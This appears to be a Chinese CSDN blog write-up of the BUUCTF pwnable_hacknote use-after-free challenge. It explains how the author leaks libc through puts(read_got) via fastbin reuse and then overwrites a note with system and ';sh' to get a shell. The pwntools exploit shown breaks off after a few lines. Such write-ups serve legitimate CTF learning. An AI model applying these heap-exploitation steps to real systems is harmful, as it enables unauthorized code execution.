BUUCTF-UAF漏洞 pwnable_hacknote

本文介绍了作者在学习过程中解决BUUCTF中的一个Use-After-Free(UAF)漏洞,通过动态分析,创建特定大小的堆块并释放到fastbin中,构造payload获取`read`地址,进一步利用libc计算`system`和`sh`,最终通过`show`执行获取shell的过程。
摘要由CSDN通过智能技术生成

BUUCTF-UAF漏洞 pwnable_hacknote

好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步
就不静态分析了,直接动态分析
在这里插入图片描述
首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分
在这里插入图片描述
然后我们释放这两个堆块,可以看到被存放进了fastbin中
在这里插入图片描述
之后我们创建一个payload,0x8个大小的,构成puts(read_got)的结构,为了之后申请时直接去执行这个函数
就获得了read的地址,之后就利用常规的libc求出版本,然后在利用相同的方式写入system和||sh(或;sh),之后show去执行获得最后的shell

在这里插入图片描述

结尾附上exp:

from pwn import *
from LibcSearcher import *

def add(size, content):
	print(r.recvuntil("Your choice :"))
	r.sendline('1')
	print(r.recvuntil("Note size :"))
	r.sendline(str(size
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值